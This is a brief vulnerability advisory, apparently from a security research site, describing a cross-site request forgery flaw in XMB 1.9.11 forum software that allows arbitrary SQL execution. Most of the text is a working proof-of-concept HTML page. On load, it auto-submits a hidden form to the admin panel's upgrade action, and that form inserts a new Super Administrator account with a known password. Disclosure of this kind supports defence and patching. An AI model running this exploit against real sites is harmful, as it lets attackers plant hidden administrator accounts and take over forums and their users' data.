Search
Software Vulnerability Tested On Date
XMB 1.9.11 Cross-site Request Forgery Windows Vista + XAMPP 9/16/2010
Description
A cross-site request forgery vulnerability in XMB 1.9.11 can be exploited to execute arbitrary SQL.
Proof of Concept
<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/xmb/cp.php?action=upgrade">
            <input type="hidden" name="upgrade" value="INSERT INTO xmb_members (username, password, status) VALUES ('new_admin', md5('Password1'), 'Super Administrator')" />
            <input type="hidden" name="upgradesubmit" value="Submit Changes" />
        </form>
    </body>
</html>